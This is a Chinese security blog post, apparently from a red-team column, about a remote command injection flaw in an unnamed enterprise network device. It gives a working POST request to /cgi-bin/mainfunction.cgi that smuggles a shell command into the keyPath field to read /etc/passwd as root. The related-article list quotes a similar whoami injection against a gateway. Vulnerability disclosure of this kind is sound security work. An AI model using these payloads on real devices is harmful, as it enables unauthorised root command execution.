某企业网络设备远程命令执行

于 2024-08-10 19:34:10 发布
阅读量328 收藏 2
点赞数 10
分类专栏: 0.红队攻防 # 9. 网络设备漏洞 3.漏洞文库 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48899364/article/details/141095136
版权

我清楚地知道,人与人的路都是不可复制的。我走在我自己的人生路上,哪怕路途的风雨再大,大到我步履维艰。哪怕荆棘丛生,刺得我伤痕遍布。我也仍旧痴痴笑笑,我体会此中滋味,我相信独游的小船终有一天,会看见两岸群山青翠,虫鸟同鸣。

漏洞描述

URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。

远程命令注入漏洞,主要影响了该网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。

漏洞实战

访问漏洞url

构造payload

POST /cgi-bin/mainfunction.cgi HTTP/1.1

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}/etc/passwd%0A%27&loginUser=a&loginPwd=a

漏洞证明

在这里插入图片描述

漏洞利用poc

漏洞证明

在这里插入图片描述

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN: 现有2000+关注。
https://rdyx0.blog.csdn.net/

公众号:儒道易行,现有10000+关注。
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
儒道易行
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞
失心少年
06-28 1804
文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!浙江宇视科技有限公司(宇视uniview)创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。2.访问/Interface/LogReport/1.txt执行得到回显。
python网络编程实现简单远程命令执行
qq_33655643的博客
04-20 5855
前言 套接字(Sockets)是双向通信信道的端点。 套接字可以在一个进程内,在同一机器上的进程之间,或者在不同主机的进程之间进行通信,主机可以是任何一台有连接互联网的机器。 一、基本语法 创建套接字,必须使用套接字模块中的socket.socket()函数。 s.bind(),此方法将地址(主机名,端口号对)绑定到套接字。 s.listen()此方法设置并启动TCP侦听器. s.accept()这被动地接受TCP客户端连接,等待直到连接到达(阻塞),如未设置,每次只能连接一个客户端 s.recv()此方法
RCE(远程命令执行)漏洞详解
sev1n的博客
04-02 2825
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3571
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行
锐捷EG易网关远程命令执行漏洞-1
1stPeak's Blog
08-12 9514
测试poc /guest_auth/guestIsUp.php 如果没有返回任何信息,且状态码为200,那么很大可能存在远程命令执行 payload如下 将whoami命令执行结果输出到xxoo.txt文件中 POST /guest_auth/guestIsUp.php mac=1&ip=127.0.0.1|whoami > xxoo.txt url查看写入的文件,获取到目标当前用户和当前目录下的文件 payload如下: http://xx.xx.xx.xx/guest_auth/xxo
IP-guard WebServer 远程命令执行漏洞
weixin_44304678的博客
11-09 1478
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
linux 远程唤醒命令,使用命令远程网络唤起主机
weixin_29116603的博客
05-08 4360
在 Linux 下可以通过 etherwake 命令来网络唤醒设备。sudo apt install etherwake检查主机是否支持网络远程唤醒首先检查 BIOS 中设置,Wake on LAN 是否开启。一般在 BIOS > Power Management > “Wake On LAN” 这个选项下。然后重启进入系统,用如下命令查看网卡 eth0 是否开启了 Wake on L...
IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞】
holyxp的博客
11-12 2601
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 3061
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞!
JAVA_RMI反序列化远程命令执行漏洞验证
qq_44828901的博客
12-29 5171
简单复现 JAVA RMI反序列化
Zabbix远程执行命令的示例详解
09-29
Zabbix是一款强大的网络监控系统,能够监测各种网络设备和服务器的性能指标,包括CPU使用率、内存使用情况、磁盘空间等。其中,Zabbix远程执行命令功能允许管理员在触发特定事件时,自动在被监控的主机上执行预定义...
shapecfg命令 管制网络设备的流量
01-09
shapecfg命令用于管制网络设备的流量...与该功能相关的Linux命令:tracepath命令 – 追踪报文的路由信息rexec命令远程执行指令客户端nmap命令 – 网络探测工具和安全和端口扫描器sftp命令 – 交互式的文件传输程序i
Python实现堡垒机模式下远程命令执行操作示例
09-19
- **远程命令执行**: 在网络环境下,通过某种协议(如SSH)从一台计算机向另一台计算机发送命令执行的过程。 #### 二、技术原理 Python 可以借助第三方库 `paramiko` 来实现 SSH 连接及命令远程执行。下面将详细...
Zabbix如何通过ssh监控获取网络设备数据
09-29
SSH是一种加密的网络协议,用于在不安全的网络上安全执行远程命令。在Zabbix中,我们可以创建一个SSH客户端类型的监控项,通过SSH连接到网络设备执行特定的命令来获取所需信息。例如,如果我们想要监控光口的...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
最新发布
m0_57291352的博客
08-09 624
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1154
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 886
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
【网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 204
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1400
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值